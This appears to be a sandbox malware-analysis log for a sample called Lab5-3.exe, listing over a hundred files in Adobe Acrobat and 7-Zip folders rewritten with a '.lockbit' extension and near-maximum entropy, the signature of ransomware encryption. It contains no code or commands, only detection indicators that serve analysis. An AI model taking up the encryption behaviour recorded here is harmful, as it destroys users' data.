                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Assets\ownership-hero-image-d.gif.lockbit entropy: 7.99918142544Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Click on 'Change' to select default PDF handler.pdf.lockbit entropy: 7.99881499568Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\resources.pak.lockbit entropy: 7.99714271215Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-enhance-popups-chunk.js.lockbit entropy: 7.99767508198Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\4dddbe6058a486f7048673e4b143f7c4.png.lockbit entropy: 7.9923634281Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-RMUpsellCard-modals-chunk.js.lockbit entropy: 7.99558813535Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-split-popups-chunk.js.lockbit entropy: 7.99545983956Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-ccx-chunk.js.lockbit entropy: 7.99722341796Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\9b1662bee64658ff8dd184737a056510.png.lockbit entropy: 7.9978049842Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-editsettings-popups-chunk.js.lockbit entropy: 7.99624416103Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\4049-chunk.js.lockbit entropy: 7.99760308926Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Q3_2022_ConnectCloudStorage.webm.lockbit entropy: 7.99819085275Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\c6534465ea418b6c252e2b74bc9e4bbb.png.lockbit entropy: 7.99931237905Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\6b0215ed0a09075330a1c6dd3dbfba1d.png.lockbit entropy: 7.99010581534Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\e992b56b1dc8ca33be3e4952595d5208.png.lockbit entropy: 7.9981845974Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\6f43d8c6da907e34ab2028ef15733412.png.lockbit entropy: 7.99386471399Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-signsettings-popups-chunk.js.lockbit entropy: 7.99228732626Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-modals-chunk.js.lockbit entropy: 7.99294785842Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Q3_2022_GetOthersToSign.webm.lockbit entropy: 7.99919101694Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Q3_2022_RedactPDFContent.webm.lockbit entropy: 7.99781926435Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Q3_2022_ToggleNewInterface.webm.lockbit entropy: 7.99410838609Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\drvSOFT.x3d.lockbit entropy: 7.99896835642Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-rsfeedback-modals-chunk.js.lockbit entropy: 7.99451010698Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\c124efa99176e538252a2ae3cef2137e.png.lockbit entropy: 7.99817892458Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Q3_2022_GetStartedWithANewFile.webm.lockbit entropy: 7.99882980849Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\83bf4cfa63b712c6973a0d510a7b2c99.png.lockbit entropy: 7.9921292927Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\0c9bbbe7a01f43c8a2c084d4926a8785.png.lockbit entropy: 7.99879105994Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-ca-ES-json-chunk.js.lockbit entropy: 7.99764047873Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\dc-mobx.js.lockbit entropy: 7.99781502376Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-cs-CZ-json-chunk.js.lockbit entropy: 7.99776487517Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-da-DK-json-chunk.js.lockbit entropy: 7.99816960746Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\a56350ec5a5b310e9f4c7e10e0b6795c.png.lockbit entropy: 7.99569787859Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\1901-chunk.js.lockbit entropy: 7.99251734254Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-ko-KR-json-chunk.js.lockbit entropy: 7.99851705501Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\Microsoft.VCLibs.x86.14.00.appx.lockbit entropy: 7.99807096625Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\9066745ff44b689b5cc89c3d73970f01.png.lockbit entropy: 7.99873967602Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Q3_2022_WorkFromAnywhere.webm.lockbit entropy: 7.99841631929Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-es-ES-json-chunk.js.lockbit entropy: 7.99802338054Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-ja-JP-json-chunk.js.lockbit entropy: 7.99808303569Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-nb-NO-json-chunk.js.lockbit entropy: 7.99783385506Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-videoplayer-chunk.js.lockbit entropy: 7.99903623363Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\css\main.css.lockbit entropy: 7.99844781747Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\js\plugin.js.lockbit entropy: 7.99566116175Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\ExpressLogo_18.svg.lockbit entropy: 7.99031495905Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_IL\license.html.lockbit entropy: 7.99321295734Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\hu_HU\license.html.lockbit entropy: 7.99494550632Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\cs_CZ\license.html.lockbit entropy: 7.99439698322Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\da_DK\license.html.lockbit entropy: 7.99469599953Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\el_GR\license.html.lockbit entropy: 7.99380530204Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ja_JP\license.html.lockbit entropy: 7.99558309482Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\license.html.lockbit entropy: 7.99576162213Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\he_IL\license.html.lockbit entropy: 7.99548140925Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ar_AE\license.html.lockbit entropy: 7.99618511049Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\AdobeID.pdf.lockbit entropy: 7.99763477101Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pl_PL\license.html.lockbit entropy: 7.99513814282Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_CN\license.html.lockbit entropy: 7.99183975263Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sv_SE\license.html.lockbit entropy: 7.99426112693Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pt_BR\license.html.lockbit entropy: 7.99426014303Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\tr_TR\license.html.lockbit entropy: 7.9943377543Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ko_KR\license.html.lockbit entropy: 7.99436407107Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ru_RU\license.html.lockbit entropy: 7.9970650496Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_TW\license.html.lockbit entropy: 7.99260021575Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_AE\license.html.lockbit entropy: 7.99364181908Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nl_NL\license.html.lockbit entropy: 7.99485488181Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sk_SK\license.html.lockbit entropy: 7.99359408752Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nb_NO\license.html.lockbit entropy: 7.99396778775Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\template3.pdf.lockbit entropy: 7.99345118302Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\it_IT\license.html.lockbit entropy: 7.99286040033Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\uk_UA\license.html.lockbit entropy: 7.99720352255Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\ENU\template1.pdf.lockbit entropy: 7.99696253148Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_GB\license.html.lockbit entropy: 7.9929500446Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\es_ES\license.html.lockbit entropy: 7.995272608Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\de_DE\license.html.lockbit entropy: 7.99360027517Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\DefaultID.pdf.lockbit entropy: 7.9979610848Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sl_SI\license.html.lockbit entropy: 7.99359367274Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\template2.pdf.lockbit entropy: 7.99406202501Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\AdobeClean-Regular.woff.lockbit entropy: 7.99893711466Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\AdobeClean-Bold.woff.lockbit entropy: 7.99878179016Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\AdobeClean-Light.woff.lockbit entropy: 7.99866247736Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_MA\license.html.lockbit entropy: 7.99550221538Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_FR\license.html.lockbit entropy: 7.99504941962Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fi_FI\license.html.lockbit entropy: 7.99467629603Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_US\license.html.lockbit entropy: 7.99404422203Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\Pointers.pdf.lockbit entropy: 7.99677110197Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\AdobePDF417.pmp.lockbit entropy: 7.99816774855Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\IA32.api.lockbit entropy: 7.99922408685Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\Faces.pdf.lockbit entropy: 7.9942981267Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\adobepdf.xdc.lockbit entropy: 7.99645006048Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\DVA.api.lockbit entropy: 7.99866911986Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\Words.pdf.lockbit entropy: 7.99809829047Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\SignHere.pdf.lockbit entropy: 7.99578420206Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\eBook.api.lockbit entropy: 7.99734741589Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\CompareMarkers.pdf.lockbit entropy: 7.99197906348Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\QRCode.pmp.lockbit entropy: 7.99709293268Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf.lockbit entropy: 7.99820548611Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\7-Zip\Lang\uk.txt.lockbit entropy: 7.99036702136Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\7-Zip\Lang\sa.txt.lockbit entropy: 7.99090454172Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\7-Zip\Lang\tt.txt.lockbit entropy: 7.99028032635Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\plugin.js.lockbit entropy: 7.99056683079Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\themeless_Reader\img_invoices@2x.png.lockbit entropy: 7.99301034826Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\Flash.mpp.lockbit entropy: 7.9988557366Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\Standard.pdf.lockbit entropy: 7.99821350076Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Updater.api.lockbit entropy: 7.99890145089Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf.lockbit entropy: 7.99717914627Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\ui-strings.js.lockbit entropy: 7.9968290078Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\ui-strings.js.lockbit entropy: 7.99722453772Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\themeless_Reader\img_flyers.png.lockbit entropy: 7.99277551392Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\themeless_Reader\img_logos@2x.png.lockbit entropy: 7.99011340824Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Comments.aapp.lockbit entropy: 7.99211823552Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\root\ui-strings.js.lockbit entropy: 7.99718998872Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\ui-strings.js.lockbit entropy: 7.99569397821Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\themeless_Reader\img_flyers@2x.png.lockbit entropy: 7.99732677943Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\ui-strings.js.lockbit entropy: 7.99608740497Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\it-it\ui-strings.js.lockbit entropy: 7.99697758553Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fi-fi\ui-strings.js.lockbit entropy: 7.99654311141Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\combineconvertpdf-rna-selector.js.lockbit entropy: 7.99899620171Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\convertpdf-selector.js.lockbit entropy: 7.99901187611Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fr-fr\ui-strings.js.lockbit entropy: 7.99703491655Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\ui-strings.js.lockbit entropy: 7.99704626169Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\exportpdf-selector.js.lockbit entropy: 7.99902722916Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\core_icons_retina.png.lockbit entropy: 7.99301956994Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\faf_icons.png.lockbit entropy: 7.99039669594Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\js\nls\ca-es\ui-strings.js.lockbit entropy: 7.99025782972Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\plugin.js.lockbit entropy: 7.99696863178Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\images\themeless\web_documentcloud_logo.png.lockbit entropy: 7.99684628067Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nb-no\ui-strings.js.lockbit entropy: 7.99675588089Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\ui-strings.js.lockbit entropy: 7.99650440584Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nl-nl\ui-strings.js.lockbit entropy: 7.99688910499Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\js\nls\uk-ua\ui-strings.js.lockbit entropy: 7.99254376249Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\js\nls\sv-se\ui-strings.js.lockbit entropy: 7.99042221844Jump to dropped file
